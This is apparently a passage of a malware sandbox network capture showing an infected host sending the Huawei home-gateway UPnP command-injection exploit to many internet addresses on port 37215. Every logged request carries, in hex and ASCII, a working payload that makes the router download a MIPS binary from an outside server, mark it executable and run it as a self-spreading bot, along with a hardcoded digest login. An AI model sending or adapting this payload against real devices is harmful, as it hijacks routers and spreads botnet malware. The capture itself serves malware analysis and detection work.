                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1633192.168.2.1544932218.75.223.17837215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:10.905545950 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1634192.168.2.1535070157.85.250.3137215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:10.905656099 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1635192.168.2.1537270157.49.193.21337215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:10.905679941 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1636192.168.2.155293257.44.179.737215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:10.905708075 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1637192.168.2.1555552187.109.198.6837215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:10.905822992 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1638192.168.2.1535502157.197.67.24437215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:10.905872107 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1639192.168.2.1560954157.46.74.7537215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:10.905909061 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1640192.168.2.154294241.44.243.14337215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:10.905965090 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1641192.168.2.155457441.144.10.2537215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:10.905993938 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1642192.168.2.155162635.213.32.9837215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:10.906027079 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 